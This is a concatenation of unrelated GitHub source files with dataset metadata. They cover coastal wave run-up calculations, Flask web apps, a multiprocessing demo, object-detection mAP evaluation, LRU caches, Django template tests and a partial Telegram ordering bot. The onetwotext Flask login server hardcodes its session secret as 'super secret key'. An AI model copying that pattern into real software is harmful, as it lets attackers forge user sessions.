roughness\n if slope_roughness == 1.0:\n print(\"Slope material: asphalt, concrete with a smooth surface.\")\n elif slope_roughness == 0.9:\n print(\"Slope material: concrete blocks, block mats.\")\n elif slope_roughness == 0.7:\n print(\"Slope material: gravel, gabions.\")\n elif slope_roughness == 0.6:\n print(\"Slope material: quarry stone (rip-rap).\")\n elif slope_roughness == 0.5:\n print(\"Slope material: cubes (random positioning).\")\n else:\n print(\"Slope material: X-blocs, tetrapods, dolosses.\")\n # Berm factor\n if berm == 0:\n berm_factor = 1\n print(f\"Dike has no berm --\\u2192 Berm fator = {berm_factor:.2f}\")\n else:\n berm_factor = 0.7\n print(f\"Dike has a berm --\\u2192 Berm fator = {berm_factor:.2f} \\\n(but it needs to accurately calculate)\")\n # Wave angle factor\n if wangle <= 80 and wangle >= 0:\n woblique = 1 - 0.0022 * wangle\n print(f\"Wave direction = {wangle:.2f}\\N{superscript zero} --\\u2192 \\\nOblique wave factor = {woblique:.4f}.\")\n else:\n woblique = 0.0824\n print(f\"Wave direction = {wangle:.2f}\\N{superscript zero} --\\u2192 \\\nOblique wave factor = {woblique:.4f}.\")\n # Calculations\n wrunup_curtaw = 1.75 * wheight * slope_roughness * berm_factor * woblique * break_par\n # Print results\n print(f\"Breaking parameter = {break_par:.2f}. \\\n\\nWavelength = {wlength:.2f} (m).\\\n\\nWave run-up (CUR-TAW equation) = {wrunup_curtaw:.3f} (m).\\n\")\n # Plot results\n fig, (a0, a1) = plt.subplots(1,2, figsize = (21, 5), \n gridspec_kw={'width_ratios': [1, 5]})\n a0.plot(wsteepness, wheight, 'h', color='gray',\n markersize=15, markerfacecolor='green',\n markeredgecolor='black', markeredgewidth=2)\n a0.set_xlim(0, 0.1)\n a0.set_ylim(0, 10)\n a0.set_xticks(np.linspace(0, 0.1, 6))\n a0.set_yticks(np.linspace(0, 10, 11))\n a0.set_xlabel('$H/L$ (-)')\n a0.set_ylabel('$H_s$ (m)')\n a0.grid()\n a1.plot(wrunup_curtaw, wheight, 'd', color='blue',\n markersize=15, markerfacecolor='green',\n markeredgecolor='black', markeredgewidth=2,\n label=\"Wave run-up (m)\")\n a1.set_xlim(0, 140)\n a1.set_ylim(0, 10)\n a1.set_xticks(np.linspace(0, 150, 31))\n a1.set_yticks(np.linspace(0, 10, 11))\n a1.set_xlabel('Wave Run-up: CUR-TAW Equation (m)')\n a1.set_ylabel('$H_s$ (m)')\n #a1.legend(loc='upper right', bbox_to_anchor=(0.90, 0.90))\n a1.grid()\n return","repo_name":"tungdaohunre/hydraulic-structure-1","sub_path":"def_wave_run_up.py","file_name":"def_wave_run_up.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4100162662","text":"\"\"\"Module that expose onetwotext server application\"\"\"\n\nfrom os.path import *\nfrom pathlib import Path\nfrom flask import *\nfrom flask_session import Session\nfrom waitress import serve\nfrom datetime import datetime, timedelta\nfrom sqlite3 import OperationalError\n\nfrom onetwotext.db_lib import *\nfrom onetwotext.utils import credential_check\nfrom onetwotext.word_calculator import *\n\n_APP = Flask(__name__)\n__WORK_DIR__ = dirname(__file__)\n\n\n@_APP.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n print(\n request.remote_addr,\n \" Connected to Server at \",\n datetime.now().strftime(\"%H:%M:%S on %d %b %Y\"),\n )\n\n return render_template(\"ott_login.html\")\n\n\n@_APP.route(\"/access_control\", methods=[\"GET\", \"POST\"])\ndef access_control():\n \"\"\"Route to control user credentials\"\"\"\n\n if request.method == \"POST\":\n username = (request.form[\"username\"]).strip().lower()\n password = request.form[\"password\"]\n\n try:\n user = get_user_data(username)\n except OperationalError as error:\n print(error)\n print(\"Try to create ott_users Table...\")\n create_db_and_default_user()\n user = get_user_data(username)\n\n if not user or not credential_check(user, password):\n return render_template(\n \"ott_login.html\",\n res=\"Wrong username or password.\",\n css=\"crash\",\n )\n else:\n import secrets\n\n token = secrets.token_hex(6)\n session[\"my_var\"] = token\n\n try:\n token\n except:\n token = session.get(\"my_var\", None)\n\n if token is not None:\n return redirect(url_for(\"onetwotext\"))\n else:\n abort(404)\n\n\n@_APP.route(\"/onetwotext\", methods=[\"GET\", \"POST\"])\ndef onetwotext():\n if session.get(\"my_var\", None):\n return render_template(\"onetwotext.html\")\n else:\n abort(404)\n\n\n@_APP.route(\"/count-text\", methods=[\"GET\", \"POST\"])\ndef count_text():\n if session.get(\"my_var\", None):\n text = (request.json.get(\"text\")).lower()\n response = python_count(text)\n return jsonify(response)\n else:\n abort(404)\n\n\n@_APP.route(\"/count-from-ai\", methods=[\"GET\", \"POST\"])\ndef count_from_ai():\n if session.get(\"my_var\", None):\n text = (request.json.get(\"text\")).lower()\n response = nn_completion_count(text)\n return jsonify(response)\n else:\n abort(404)\n\n\ndef start_server(host: str, port: str) -> None:\n \"\"\"Basic function to start onetwotext app as a server with users credentials\n and session handling\n\n Input:\n ------\n - host:str\n string variable to set exopsing host for server.\n - port:str\n string variable to set exopsing port for server.\n \"\"\"\n\n session_dir = Path(expanduser(\"~\")) / \"ott_server_sessions\"\n\n if not session_dir.exists():\n session_dir.mkdir(parents=True)\n\n _APP.secret_key = \"super secret key\"\n _APP.config[\"SESSION_TYPE\"] = \"filesystem\"\n _APP.config[\"SESSION_FILE_DIR\"] = session_dir\n _APP.config[\"PERMANENT_SESSION_LIFETIME\"] = timedelta(minutes=10)\n\n sess = Session()\n sess.init_app(_APP)\n\n serve(_APP, host=host, port=port)\n","repo_name":"RicDV/onetwotext","sub_path":"onetwotext/ott_app_sever.py","file_name":"ott_app_sever.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30038245464","text":"from multiprocessing import Process\nfrom time import sleep\nimport os\n\n\ndef task1(s, name):\n while True:\n sleep(s)\n print('任务一;;;;;;', os.getpid(), '----------', os.getppid(), name)\n\n\ndef task2(s, name):\n while True:\n sleep(s)\n print('任务二;;;;;', os.getpid(), '----------', os.getppid(), name)\n\n\nnumber = 1\nif __name__ == '__main__':\n # 子进程p p1\n print(os.getpid())\n p = Process(target=task1, name='任务1', args=(1, 'aa')) # arg是可迭代的对象传入函数中\n print(p)\n p.start()\n p1 = Process(target=task2, name='任务2', args=(2, 'bb'))\n print(p1)\n p1.start()\n\n while True: # 主进程\n number += 1\n sleep(0.2)\n if number==100:\n p.terminate()\n p1.terminate()\n break\n else:\n print('-------------number',number)\n# 在run当前.py文件的时候系统就已经开辟一个进程了 所以定义的p 和 p1都是子进程\n","repo_name":"Luciano0000/Pyhon-","sub_path":"multiprocessing/QianFeng029process2.py","file_name":"QianFeng029process2.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72107841287","text":"#!/bin/python\nimport time\nfrom flask import Flask, render_template, request\nimport json\nimport os\nfrom player import *\nfrom stream import StreamList\n\n\napp = Flask(__name__)\n#btooth=Bluetoothctl()\nplayer = Player()\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/get_paired_devices\")\ndef get_paired_devices():\n # paired_list = btooth.get_paired_devices()\n # return json.dumps(paired_list)\n return \"OK\"\n\n@app.route(\"/scan_available_devices\")\ndef scan_available_devices():\n return \"OK\"\n # available_devices_list = btooth.start_scan()\n # time.sleep(15)\n # print(available_devices_list)\n # return json.dumps(available_devices_list)\n\n@app.route(\"/add_stream\", methods=['POST'])\ndef add_stream():\n content = request.get_json();\n if content != None:\n StreamList().add_stream(content['name'], content['url'], content['genre'])\n return {\"result\" : \"success\"}, 200\n else:\n return {\"result\" : \"error\"}, 200\n\n@app.route(\"/play\", methods=['POST'])\ndef play():\n content = request.get_json();\n if content != None: \n print(content)\n player.play(content['url'])\n else:\n player.play(player.url)\n return {\"result\" : \"success\"}, 200\n\n@app.route(\"/remove\", methods=['POST'])\ndef remove_item():\n content = request.get_json();\n StreamList().remove_stream(content['url'])\n return {\"result\" : \"success\"}, 200\n\n@app.route(\"/stop\", methods=['POST'])\ndef stop_music():\n player.stop()\n return {\"result\" : \"success\"}, 200\n\n@app.route(\"/get_playlist\", methods=['GET'])\ndef get_playlist():\n print(\"Get playlist!\")\n return StreamList().get_list(), 200\n\n@app.route(\"/bluetooth_connect\")\ndef bluetooth_connect():\n print (\"Connecting to bluetooth speaker\")\n # btooth.connect(\"00:18:09:6A:2A:D5\")\n return \"OK\"\n\n@app.route(\"/current_playing\")\ndef current_playing():\n return '{\"status\" : \"'+ player.play_status +'\", \"station_name\" : \"'+ player.station_name + '\", \"current_track\" : \"' + player.current_track + '\"}', 200\n\n@app.route(\"/set_volume\", methods=['POST'])\ndef set_volume():\n content = request.get_json();\n player.volume = int(content['volume']);\n player.mute = bool(content['mute']);\n return {\"result\" : \"success\"}, 200\n\n\nif __name__ == \"__main__\":\n player.thread.start()\n app.run(host=\"0.0.0.0\", port=8080)\n \n","repo_name":"AlexandarDjordjevic/WebPlayer","sub_path":"web_app.py","file_name":"web_app.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"51068948006","text":"'''\r\nAn example for using BoundingBox class, plotting precision-recall curve, plotting BoundingBox objects on images, and\r\ncomputing PASCAL-VOC-style mAP (11-points-interpolation method and all-points-interpolation method).\r\n'''\r\n\r\nimport cv2\r\nimport os\r\nfrom lib import object_detection_evaluation as ode\r\nfrom lib import BoundingBox as bb\r\nimport numpy as np\r\nfrom lib import utils\r\n\r\n\r\nCV2_FONT = cv2.FONT_HERSHEY_SIMPLEX\r\n\r\n\r\n################################################################\r\n# Prepare for data (An example for using the BoundingBox class)#\r\n################################################################\r\nDATA_DIR = 'data/'\r\n\r\n# Three images used for evaluation\r\nimg_filename_list = os.listdir(DATA_DIR)\r\nimg_path_list = []\r\nfor filename in img_filename_list:\r\n img_path_list.append(os.path.join(DATA_DIR, filename))\r\n\r\n# Create ground truth bounding boxes and predicted bounding boxes for the images and store them in the lists\r\ngt_bb_list = []\r\npr_bb_list = []\r\n# Define the ground truth bounding box and the predicted bounding box for img1\r\nimg1_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/001.jpg', x1=72, y1=133, x2=881, y2=575, bb_type='gt')\r\nimg1_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/001.jpg', x1=60, y1=120, x2=850, y2=500, bb_type='pr', \\\r\n prediction_confidence=0.8)\r\ngt_bb_list.append(img1_gt_bb1)\r\npr_bb_list.append(img1_pr_bb1)\r\n# Define the ground truth bounding box and the predicted bounding box for img2\r\nimg2_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/002.jpg', x1=4, y1=160, x2=251, y2=313, bb_type='gt')\r\nimg2_gt_bb2 = bb.BoundingBox(class_id='object', img_path='data/002.jpg', x1=294, y1=10, x2=458, y2=309, bb_type='gt')\r\nimg2_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/002.jpg', x1=98, y1=134, x2=318, y2=317, bb_type='pr', \\\r\n prediction_confidence=0.77)\r\ngt_bb_list.append(img2_gt_bb1)\r\ngt_bb_list.append(img2_gt_bb2)\r\npr_bb_list.append(img2_pr_bb1)\r\n# Define the ground truth bounding box and the predicted bounding box for img3\r\nimg3 = cv2.imread('data/003.jpg')\r\nimg3_height, img3_width = img3.shape[:2]\r\nimg3_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/003.jpg', x1=26, y1=23, x2=317, y2=img3_height-1,\r\n bb_type='gt')\r\nimg3_gt_bb2 = bb.BoundingBox(class_id='object', img_path='data/003.jpg', x1=258, y1=0, x2=575, y2=396, bb_type='gt')\r\nimg3_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/003.jpg', x1=10, y1=10, x2=210, y2=310, bb_type='pr', \\\r\n prediction_confidence=0.70)\r\nimg3_pr_bb2 = bb.BoundingBox(class_id='object', img_path='data/003.jpg', x1=266, y1=47, x2=580, y2=329, bb_type='pr', \\\r\n prediction_confidence=0.66)\r\ngt_bb_list.append(img3_gt_bb1)\r\ngt_bb_list.append(img3_gt_bb2)\r\npr_bb_list.append(img3_pr_bb1)\r\npr_bb_list.append(img3_pr_bb2)\r\n# Define the ground truth bounding box and the predicted bounding box for img4\r\nimg4_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=52, y1=77, x2=252, y2=184, bb_type='gt')\r\nimg4_gt_bb2 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=266, y1=87, x2=410, y2=187, bb_type='gt')\r\nimg4_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=30, y1=60, x2=106, y2=104, bb_type='pr', \\\r\n prediction_confidence=0.53)\r\nimg4_pr_bb2 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=210, y1=72, x2=410, y2=194, bb_type='pr', \\\r\n prediction_confidence=0.59)\r\nimg4_pr_bb3 = bb.BoundingBox(class_id='object', img_path='data/004.jpg', x1=390, y1=160, x2=420, y2=190, bb_type='pr', \\\r\n prediction_confidence=0.40)\r\ngt_bb_list.append(img4_gt_bb1)\r\ngt_bb_list.append(img4_gt_bb2)\r\npr_bb_list.append(img4_pr_bb1)\r\npr_bb_list.append(img4_pr_bb2)\r\npr_bb_list.append(img4_pr_bb3)\r\n# Define the ground truth bounding box and the predicted bounding box for img5\r\nimg5_gt_bb1 = bb.BoundingBox(class_id='object', img_path='data/005.jpg', x1=1, y1=127, x2=266, y2=473, bb_type='gt')\r\nimg5_gt_bb2 = bb.BoundingBox(class_id='object', img_path='data/005.jpg', x1=209, y1=96, x2=472, y2=396, bb_type='gt')\r\nimg5_pr_bb1 = bb.BoundingBox(class_id='object', img_path='data/005.jpg', x1=6, y1=115, x2=277, y2=475, bb_type='pr', \\\r\n prediction_confidence=0.97)\r\nimg5_pr_bb2 = bb.BoundingBox(class_id='object', img_path='data/005.jpg', x1=180, y1=300, x2=470, y2=390, bb_type='pr', \\\r\n prediction_confidence=0.61)\r\ngt_bb_list.append(img5_gt_bb1)\r\ngt_bb_list.append(img5_gt_bb2)\r\npr_bb_list.append(img5_pr_bb1)\r\npr_bb_list.append(img5_pr_bb2)\r\n\r\n\r\n###################################################################################################################\r\n# Test evaluation methods (plot precision-recall curve, compute mAP by the 11-points-interpolation method and the #\r\n# all-points-interpolation method of the PASCAL VOC) #\r\n###################################################################################################################\r\n# Get the dictionary list for evaluated predicted bounding boxes, whose item contains a predicted bounding box and a\r\npr_bb_dict_list = ode.eval_predicted_bb_list(gt_bb_list, pr_bb_list)\r\nclass_id_list = list(set([bb_dict['bb'].get_class_id() for bb_dict in pr_bb_dict_list]))\r\nap_by_11_points_list = []\r\nap_by_all_points_list = []\r\n\r\nfor class_id in class_id_list:\r\n class_pr_bb_dict_list = \\\r\n [pr_bb_dict for pr_bb_dict in pr_bb_dict_list if pr_bb_dict['bb'].get_class_id() == class_id]\r\n class_gt_bb_list = [gt_bb for gt_bb in gt_bb_list if gt_bb.get_class_id() == class_id]\r\n acc_precision_recall_dict_list = \\\r\n ode.draw_precision_recall_curve(class_pr_bb_dict_list, len(class_gt_bb_list), plot=True)\r\n ap_by_11_points = ode.get_ap_by_11_points_interpolation(acc_precision_recall_dict_list)\r\n ap_by_11_points_list.append(ap_by_11_points)\r\n ap_by_all_points = ode.get_ap_by_all_points_interpolation(acc_precision_recall_dict_list)\r\n ap_by_all_points_list.append(ap_by_all_points)\r\n\r\nmap_by_11_points = np.mean(ap_by_11_points_list)\r\nmap_by_all_points = np.mean(ap_by_all_points_list)\r\n\r\nprint('The mAP calculated by the 11-points-interpolation method of PASCAL VOC is: ', map_by_11_points)\r\nprint('The mAP calculated by the 11-points-interpolation method of PASCAL VOC is: ', map_by_all_points)\r\n\r\n\r\n############################################################\r\n# An example for Visualizing images with corresponding bbs #\r\n############################################################\r\n# for img_path in img_path_list:\r\n# img_gt_bb_list = [gt_bb for gt_bb in gt_bb_list if gt_bb.get_img_path() == img_path]\r\n# # img_pr_bb_list = [pr_bb for pr_bb in pr_bb_list if pr_bb.get_img_path() == img_path]\r\n# img_pr_bb_dict_list = [pr_bb_dict for pr_bb_dict in pr_bb_dict_list if pr_bb_dict['bb'].get_img_path() == img_path]\r\n# img_with_bbs = cv2.imread(img_path)\r\n# for img_gt_bb in img_gt_bb_list:\r\n# utils.draw_bb_on_img(img_gt_bb, img_with_bbs)\r\n# for img_pr_bb_dict in img_pr_bb_dict_list:\r\n# utils.draw_bb_on_img(img_pr_bb_dict['bb'], img_with_bbs)\r\n# upper_left_corner = img_pr_bb_dict['bb'].get_upper_left_corner()\r\n# cv2.putText(img_with_bbs, str(img_pr_bb_dict['TP']), upper_left_corner, CV2_FONT, 0.5, \\\r\n# (0, 0, 0), 1, cv2.LINE_AA)\r\n# cv2.imshow(img_path, img_with_bbs)\r\n\r\n\r\ncv2.waitKey(0)\r\n\r\n\r\n","repo_name":"neoxu314/2D-Computer-Vision-Metrics","sub_path":"example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"75331321287","text":"# Video link: https://youtu.be/3ocyjP7gnHY\n# Method 1: using doubly linked list + dictionary\n\nclass Node:\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.prev = None\n self.next = None\nclass LRUCache:\n def __init__(self, capacity):\n self.capacity = capacity\n self.dic = {} # {key : node}\n self.head = self.tail = Node() #dummy nodes\n self.head.next = self.tail\n self.tail.prev = self.head\n def get(self, key):\n if key not in self.dic:\n return -1\n else:\n node = self.dic[key]\n self.evict(node)\n self.insertToEnd(node)\n return node.value\n def put(self, key, value):\n if key in self.dic:\n self.dic[key].value = value\n node = self.dic[key]\n self.evict(node)\n self.insertToEnd(node)\n else:\n if len(self.dic)==self.capacity:\n # delete lru least recently used node in dictionary and in list. order does not matter because we've save that node in a variable (lru_node is referencing to that node, so it won't lost in this block, if will lost once we are out of the block)\n # if we do not save self.head.next to a new reference, we need to delete it in dic first then in list, otherwise, the when we say del self.dic[self.head.next], the key is the second node's key\n lru_node = self.head.next\n del self.dic[lru_node.key]\n self.evict(lru_node)\n\n newNode = Node(key, value)\n self.insertToEnd(newNode)\n self.dic[key] = newNode\n\n def evict(self, node):\n node.prev.next = node.next\n node.next.prev = node.prev\n\n def insertToEnd(self, node):\n last_node = self.tail.prev # tail is dummy node, last_node is the most recently used node\n node.prev = last_node\n node.next = self.tail\n self.tail.prev = node\n last_node.next = node\n\n# Method 2: using OrderedDict\n\nfrom collections import OrderedDict\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.dic = OrderedDict()\n \n\n def get(self, key: int) -> int:\n if key not in self.dic:\n return -1\n else:\n self.dic.move_to_end(key)\n return self.dic[key]\n \n\n def put(self, key: int, value: int) -> None:\n if key in self.dic:\n self.dic[key] = value\n self.dic.move_to_end(key)\n else:\n if self.capacity == len(self.dic):\n self.dic.popitem(last = False) # throw away the first in queue\n self.dic[key] = value\n\n","repo_name":"DxSnow/coding_practice_python","sub_path":"LRU_cache.py","file_name":"LRU_cache.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69793915848","text":"import fudge\nfrom django.conf import settings\nfrom django.core import urlresolvers\nfrom django.template import (\n Template, Context, TemplateDoesNotExist, TemplateSyntaxError)\n\nfrom armstrong.core.arm_sections.models import Section\nfrom ._utils import ArmSectionsTestCase\n\n\nclass SectionMenuTestCase(ArmSectionsTestCase):\n def setUp(self):\n self.string = \"\"\n self.context = Context()\n\n def tearDown(self):\n # Clear the cached template between test runs\n if hasattr(self, '_rendered_template'):\n del self._rendered_template\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Set Template settings to known values\"\"\"\n cls.old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, False\n\n @classmethod\n def tearDownClass(cls):\n settings.TEMPLATE_DEBUG = cls.old_td\n\n @property\n def rendered_template(self):\n \"\"\"Cache the rendered template result during a test run\"\"\"\n if not hasattr(self, '_rendered_template'): # pragma: no cover\n template = \"{% load section_helpers %}\" + self.string\n self._rendered_template = Template(template).render(self.context)\n return self._rendered_template\n\n def test_render_without_parameters(self):\n self.string = '{% section_menu %}'\n self.assertNotIn(\"
%s\" % (link, section.title)\n self.assertIn(section_link, self.rendered_template)\n\n def test_section_view_must_be_in_urlconf(self):\n self.string = '{% section_menu section_view=\"nonsense\" %}'\n with self.assertRaises(urlresolvers.NoReverseMatch):\n self.rendered_template\n\n def test_render_with_sections_subset(self):\n subset = Section.objects.filter(full_slug__startswith=\"sports\")\n self.context['subset'] = subset\n self.string = '{% section_menu sections=subset %}'\n\n for section in Section.objects.all():\n if section in subset:\n self.assertIn(section.title, self.rendered_template)\n else:\n self.assertNotIn(section.title, self.rendered_template)\n\n def test_subsections_nest_properly(self):\n subset = Section.objects.filter(full_slug__startswith=\"sports\")\n self.context['subset'] = subset\n self.string = '{% section_menu sections=subset %}'\n\n occurrences = self.rendered_template.count('
    ')\n self.assertEqual(occurrences, 2)\n\n def test_empty_sections_yields_empty_list(self):\n self.context['subset'] = []\n self.string = '{% section_menu sections=subset %}'\n self.assertNotIn(\"
  • \", self.rendered_template)\n","repo_name":"armstrong/armstrong.core.arm_sections","sub_path":"tests/template_tags.py","file_name":"template_tags.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"19604593572","text":"# -*- coding: utf-8 -*-\nimport sqlite3\nimport telebot\nimport config\nimport utils\n\nbot = telebot.TeleBot(config.token)\n\n# Возможно полезная херня с сортированным вложенным меню\n# # Создание сортированного списка разделов меню\n# #sorted_sections_list = sorted(config.menu_keyboard.items(), key=lambda t: t[0]) # Список тьюплов ключ-значение\n# sorted_sections_list = sorted(config.menu_keyboard, key=lambda t: t[0])\n# # Создание словаря клавиатур (клавиатура для каждого раздела)\n# menu_keyboard = [telebot.types.InlineKeyboardMarkup(row_width=2) for i in range(len(sorted_sections_list)+1)]\n# ## Создание сортированного словаря клавиатур (сортировка по названию раздела)\n# #menu_keyboard = OrderedDict(sorted(keyboards_dict.items(), key=lambda t: t[0]))\n# # Создание кнопок для каждой клавиатуры\n# for i, item in enumerate(sorted_sections_list, 1):\n# buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_'+str(i)+'_'+str(j))\n# for j, button_text in enumerate(config.menu_keyboard[item], 1))\n# menu_keyboard[i].add(*buttons)\n# # Добавление клавиатуры для разделов\n# buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_'+str(i))\n# for i, button_text in enumerate(config.menu_keyboard, 1))\n# menu_keyboard[0].add(*buttons)\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n user_id = str(message.from_user.id)\n print('Бот запущен пользователем', user_id)\n utils.set_basket(user_id)\n bot.send_message(message.chat.id, config.main_menu, parse_mode='markdown', reply_markup=main_menu_keyboard)\n\n# ВОЗВРАТ В МЕНЮ\n\n@bot.message_handler(func=lambda item: item.text == config.back_button, content_types=['text'])\ndef back(message):\n print('Пользователь', message.from_user.id, 'вернулся в основное меню')\n bot.send_message(message.chat.id, config.main_menu, reply_markup=main_menu_keyboard)\n\n# ОПИСАНИЕ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[0], content_types=['text'])\ndef description(message):\n print('Пользователь', message.from_user.id, 'открыл \"Описание\"')\n bot.send_message(message.chat.id, config.description, reply_markup=back_keyboard)\n\n# ФОТОГРАФИИ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[1], content_types=['text'])\ndef photos(message):\n print('Пользователь', message.from_user.id, 'открыл \"Фотографии\"')\n bot.send_message(message.chat.id, config.photos, reply_markup=back_keyboard)\n\n# МЕНЮ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[2], content_types=['text'])\ndef menu(message):\n print('Пользователь', message.from_user.id, 'открыл \"Меню\"')\n bot.send_message(message.chat.id, config.menu, reply_markup=menu_keyboard)\n\n@bot.callback_query_handler(func=lambda query: 'menu' in query.data)\ndef menu_section(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n section_number = int(query.data[5:])\n section = sorted_sections_list[section_number]\n print('Пользователь', user_id, 'открыл \"Раздел меню', section_number+1, '\" в \"Меню\"')\n\n bot.edit_message_text(section, query.message.chat.id, query.message.message_id)\n # ЗДЕСЬ НУЖНА ВЫГРУЗКА БЛЮД РАЗДЕЛА ИЗ БД\n for item in config.menu_keyboard[section]:\n bot.send_message(query.message.chat.id, item, reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: '->' in query.data)\ndef amount_inc(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n item = query.data.split('_')[1]\n\n utils.add_to_basket(user_id, item)\n if 'b->' in query.data:\n bot.edit_message_reply_markup(query.message.chat.id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item, basket=True))\n else:\n bot.edit_message_reply_markup(query.message.chat.id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: '<-' in query.data)\ndef amount_dec(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n chat_id = query.message.chat.id\n item = query.data.split('_')[1]\n\n utils.remove_amount(user_id, item)\n if not utils.item_amount(user_id, item):\n utils.del_from_basket(user_id, item)\n if 'b<-' in query.data:\n bot.delete_message(chat_id, query.message.message_id)\n bot.send_message(chat_id, config.empty_basket)\n else:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n elif 'b<-' in query.data:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item, basket=True))\n else:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: query.data == 'to_basket')\ndef to_basket(query):\n bot.answer_callback_query(query.id)\n basket(str(query.from_user.id), query.message.chat.id)\n\n# КОРЗИНА\n\ndef basket(user_id, chat_id):\n _basket = utils.get_basket(user_id)\n print('Пользователь', user_id, 'открыл \"Корзина\"')\n print(utils.get_basket(user_id))\n\n if not _basket:\n bot.send_message(chat_id, config.basket)\n bot.send_message(chat_id, config.empty_basket)\n else:\n bot.send_message(chat_id, config.basket, reply_markup=pay_keyboard)\n for item in _basket:\n bot.send_message(chat_id, item, reply_markup=amount_keyboard(user_id, item, basket=True))\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[3], content_types=['text'])\ndef _basket(message):\n basket(str(message.from_user.id), message.chat.id)\n\n@bot.callback_query_handler(func=lambda query: query.data[:6] == 'amount')\ndef item_amount(query):\n print(utils.get_basket(str(query.from_user.id)))\n bot.answer_callback_query(callback_query_id=query.id)\n\n@bot.callback_query_handler(func=lambda query: query.data[:6] == 'remove')\ndef remove(query):\n bot.answer_callback_query(callback_query_id=query.id)\n\n utils.del_from_basket(str(query.from_user.id), query.data[7:])\n bot.delete_message(chat_id=query.from_user.id, message_id=query.message.message_id)\n print(utils.get_basket(str(query.from_user.id)))\n if not utils.get_basket(str(query.from_user.id)):\n bot.send_message(chat_id=query.message.chat.id, text=config.empty_basket)\n\n# ОФОРМЛЕНИЕ ЗАКАЗА\n\n@bot.message_handler(func=lambda item: item.text == config.pay_button, content_types=['text'])\ndef payment(message):\n print('Пользователь', message.from_user.id, 'начал оформление заказа')\n pay_way_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n pay_way_keyboard.add(telebot.types.KeyboardButton(config.pay_way[0]),\n telebot.types.KeyboardButton(config.pay_way[1]),\n telebot.types.KeyboardButton(config.back_button))\n bot.send_message(message.chat.id, config.choose_pay_way, reply_markup=pay_way_keyboard)\n\n# ЗДЕСЬ НУЖНА ВЫГРУЗКА ДАННЫХ ПО КАЖДОМУ ПРОДУКТУ ИЗ КОРЗИНЫ ИЗ БД\n@bot.message_handler(func=lambda item: item.text == config.pay_way[0], content_types=['text'])\ndef pay_newAPI(message):\n print('Пользователь', message.from_user.id, 'оформляет заказ через Telegram')\n bot.send_message(message.chat.id, config.view_basket, reply_markup=back_keyboard)\n msg = ''\n price = 0\n for item in utils.get_basket(str(message.from_user.id)):\n # НАДЕЮСЬ, ЧТО НУЖНО ДЕЛАТЬ ПОЯСНЕНИЙ НЕ ТРЕБУЕТСЯ, НО ЕСЛИ ЧТО, ЗВОНИ :-*\n amount = utils.item_amount(str(message.from_user.id), item)\n msg += ' - ' + item + ': ' + str(amount) + '\\n'\n price += amount * 10000\n prices = [telebot.types.LabeledPrice(config.check_num, price)]\n\n new_pay = telebot.types.InlineKeyboardMarkup(row_width=1)\n new_pay.add(telebot.types.InlineKeyboardButton(text=config.pay, pay=True))\n\n bot.send_invoice(chat_id=message.chat.id,\n title=config.check_num,\n description=msg,\n invoice_payload='invoice',\n provider_token=config.provider_token,\n start_parameter='invoice',\n currency='rub',\n prices=prices,\n need_name=True,\n need_phone_number=True,\n need_shipping_address=True,\n is_flexible=True,\n reply_markup=new_pay)\n\n@bot.shipping_query_handler(func=lambda query: True)\ndef shipping(shipping_query):\n shipping_options = []\n\n shipping_option = telebot.types.ShippingOption('delivery', 'Доставка курьером')\n shipping_option.add_price(telebot.types.LabeledPrice('Курьер', 10000))\n 